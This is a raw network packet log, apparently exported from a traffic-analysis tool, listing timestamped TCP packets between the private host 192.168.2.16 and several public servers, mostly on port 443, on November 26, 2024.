                                                                              Nov 26, 2024 20:54:42.954161882 CET49738443192.168.2.16104.17.25.14
                                                                              Nov 26, 2024 20:54:42.954169035 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:42.954210997 CET49738443192.168.2.16104.17.25.14
                                                                              Nov 26, 2024 20:54:42.954803944 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:42.962498903 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:42.962577105 CET49738443192.168.2.16104.17.25.14
                                                                              Nov 26, 2024 20:54:42.962582111 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:42.967904091 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:42.967971087 CET49737443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:42.967992067 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:42.971224070 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:42.971278906 CET49738443192.168.2.16104.17.25.14
                                                                              Nov 26, 2024 20:54:42.971285105 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:42.976089001 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:42.976181030 CET49737443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:42.976197958 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:42.984761953 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:42.984850883 CET49737443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:42.984869957 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:43.024219990 CET49738443192.168.2.16104.17.25.14
                                                                              Nov 26, 2024 20:54:43.024228096 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:43.040215015 CET49737443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:43.070822954 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:43.072222948 CET49738443192.168.2.16104.17.25.14
                                                                              Nov 26, 2024 20:54:43.120229006 CET49737443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:43.120307922 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:43.155045986 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:43.159343958 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:43.159405947 CET49738443192.168.2.16104.17.25.14
                                                                              Nov 26, 2024 20:54:43.159419060 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:43.167206049 CET49737443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:43.168235064 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:43.168298006 CET49738443192.168.2.16104.17.25.14
                                                                              Nov 26, 2024 20:54:43.168304920 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:43.177052021 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:43.177114010 CET49738443192.168.2.16104.17.25.14
                                                                              Nov 26, 2024 20:54:43.177119970 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:43.185784101 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:43.185870886 CET49738443192.168.2.16104.17.25.14
                                                                              Nov 26, 2024 20:54:43.185875893 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:43.203366995 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:43.203428030 CET49738443192.168.2.16104.17.25.14
                                                                              Nov 26, 2024 20:54:43.203433990 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:43.208726883 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:43.208736897 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:43.208769083 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:43.208782911 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:43.208792925 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:43.208815098 CET49737443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:43.208849907 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:43.208867073 CET49737443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:43.208906889 CET49737443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:43.212146044 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:43.212233067 CET49738443192.168.2.16104.17.25.14
                                                                              Nov 26, 2024 20:54:43.212238073 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:43.220988035 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:43.221052885 CET49738443192.168.2.16104.17.25.14
                                                                              Nov 26, 2024 20:54:43.221076012 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:43.229759932 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:43.229847908 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:43.229881048 CET49738443192.168.2.16104.17.25.14
                                                                              Nov 26, 2024 20:54:43.229888916 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:43.229933977 CET49738443192.168.2.16104.17.25.14
                                                                              Nov 26, 2024 20:54:43.238610029 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:43.245076895 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:43.245121956 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:43.245168924 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:43.245188951 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:43.245188951 CET49737443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:43.245230913 CET49737443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:43.245248079 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:43.245261908 CET49737443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:43.245311975 CET49737443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:43.279251099 CET49738443192.168.2.16104.17.25.14
                                                                              Nov 26, 2024 20:54:43.279257059 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:43.327236891 CET49738443192.168.2.16104.17.25.14
                                                                              Nov 26, 2024 20:54:43.360091925 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:43.364290953 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:43.364392042 CET49738443192.168.2.16104.17.25.14
                                                                              Nov 26, 2024 20:54:43.364397049 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:43.372637987 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:43.372661114 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:43.372714043 CET49738443192.168.2.16104.17.25.14
                                                                              Nov 26, 2024 20:54:43.372719049 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:43.372762918 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:43.372770071 CET49738443192.168.2.16104.17.25.14
                                                                              Nov 26, 2024 20:54:43.372813940 CET49738443192.168.2.16104.17.25.14
                                                                              Nov 26, 2024 20:54:43.372931957 CET49738443192.168.2.16104.17.25.14
                                                                              Nov 26, 2024 20:54:43.372945070 CET44349738104.17.25.14192.168.2.16
                                                                              Nov 26, 2024 20:54:43.407942057 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:43.407960892 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:43.407989025 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:43.408040047 CET49737443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:43.408077002 CET49737443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:43.408092976 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:43.408150911 CET49737443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:43.443731070 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:43.443748951 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:43.443834066 CET49737443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:43.443854094 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:43.443912029 CET49737443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:43.459227085 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:43.459398031 CET49737443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:43.459412098 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:43.459506035 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:43.459561110 CET49737443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:43.459665060 CET49737443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:43.459697962 CET44349737151.101.2.137192.168.2.16
                                                                              Nov 26, 2024 20:54:44.050405025 CET44349740104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.050673008 CET49740443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.050754070 CET44349740104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.051759005 CET44349740104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.051837921 CET49740443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.052120924 CET49740443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.052216053 CET44349740104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.052263975 CET49740443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.095341921 CET44349740104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.097630024 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.097865105 CET49739443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.097897053 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.098936081 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.099004030 CET49739443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.099270105 CET49739443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.099349022 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.099400043 CET49739443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.103168964 CET49740443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.103179932 CET44349740104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.143335104 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.151186943 CET49740443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.151252985 CET49739443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.151264906 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.199202061 CET49739443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.506738901 CET44349740104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.506953955 CET44349740104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.507101059 CET49740443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.507118940 CET44349740104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.507323980 CET44349740104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.507386923 CET49740443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.507395983 CET44349740104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.518220901 CET44349740104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.518306017 CET49740443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.518321037 CET44349740104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.522947073 CET44349740104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.523034096 CET49740443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.523047924 CET44349740104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.525147915 CET49741443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.525183916 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.525273085 CET49741443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.525499105 CET49741443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.525515079 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.558238029 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.558296919 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.558461905 CET49739443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.558490992 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.558933020 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.558959007 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.558988094 CET49739443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.558999062 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.559040070 CET49739443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.565198898 CET49740443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.566809893 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.575114965 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.575177908 CET49739443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.575186968 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.583522081 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.583576918 CET49739443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.583584070 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.613173008 CET4968080192.168.2.16192.229.211.108
                                                                              Nov 26, 2024 20:54:44.629172087 CET49739443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.634469986 CET44349740104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.638618946 CET44349740104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.638775110 CET49740443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.638786077 CET44349740104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.682984114 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.693275928 CET49740443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.698491096 CET44349740104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.704215050 CET44349740104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.704406023 CET49740443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.704423904 CET44349740104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.712518930 CET44349740104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.712590933 CET49740443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.712600946 CET44349740104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.719089985 CET44349740104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.719181061 CET49740443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.719189882 CET44349740104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.724209070 CET49739443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.724277973 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.727406025 CET44349740104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.727459908 CET49740443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.727468014 CET44349740104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.727485895 CET44349740104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.727539062 CET49740443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.727565050 CET49740443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.727581024 CET44349740104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.729372978 CET49742443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.729406118 CET44349742104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.729485989 CET49742443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.729701996 CET49742443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.729715109 CET44349742104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.763428926 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.763582945 CET49739443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.763608932 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.773483992 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.773542881 CET49739443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.773569107 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.781796932 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.781851053 CET49739443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.781867027 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.790208101 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.790265083 CET49739443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.790280104 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.798599005 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.798646927 CET49739443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.798661947 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.807058096 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.807116985 CET49739443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.807128906 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.815490961 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.815556049 CET49739443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.815572977 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.823862076 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.823913097 CET49739443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.823928118 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.830538988 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.830589056 CET49739443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.830602884 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.843197107 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.843276978 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.843347073 CET49739443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.843364000 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.843404055 CET49739443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.849564075 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.849697113 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.849761963 CET49739443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.849776030 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:44.849828959 CET49739443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.849975109 CET49739443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:44.849992037 CET44349739104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:45.790553093 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:45.790872097 CET49741443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:45.790896893 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:45.791222095 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:45.791513920 CET49741443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:45.791577101 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:45.791673899 CET49741443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:45.839359045 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.014519930 CET44349742104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.014843941 CET49742443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:46.014899969 CET44349742104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.015232086 CET44349742104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.015572071 CET49742443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:46.015676975 CET44349742104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.015727997 CET49742443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:46.062210083 CET49742443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:46.062232971 CET44349742104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.253412008 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.253550053 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.253635883 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.253652096 CET49741443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:46.253674984 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.253724098 CET49741443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:46.253731012 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.258022070 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.258095026 CET49741443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:46.258102894 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.266391039 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.266455889 CET49741443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:46.266463041 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.275043964 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.275115967 CET49741443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:46.275130033 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.317195892 CET49741443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:46.379867077 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.428185940 CET49741443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:46.454214096 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.458101988 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.458178997 CET49741443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:46.458189964 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.466120958 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.466191053 CET49741443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:46.466198921 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.477183104 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.477266073 CET49741443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:46.477274895 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.483475924 CET44349742104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.483541012 CET44349742104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.483603954 CET49742443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:46.484060049 CET49742443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:46.484092951 CET44349742104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.485224009 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.485279083 CET49741443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:46.485286951 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.486459017 CET49743443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:46.486489058 CET44349743104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.486563921 CET49743443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:46.486799955 CET49743443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:46.486814022 CET44349743104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.493206024 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.493268013 CET49741443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:46.493275881 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.501173019 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.501231909 CET49741443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:46.501239061 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.509406090 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.509469986 CET49741443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:46.509478092 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.517375946 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.517440081 CET49741443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:46.517446995 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.524816036 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.524879932 CET49741443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:46.524887085 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.532263041 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.532322884 CET49741443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:46.532330990 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.547024965 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.547089100 CET49741443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:46.547096968 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.554375887 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.554434061 CET49741443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:46.554441929 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.604183912 CET49741443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:46.655411959 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.657865047 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.657934904 CET49741443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:46.657949924 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.680645943 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.680766106 CET49741443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:46.680775881 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.681256056 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.681324959 CET49741443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:46.681332111 CET44349741104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:46.681385994 CET49741443192.168.2.16104.18.95.41
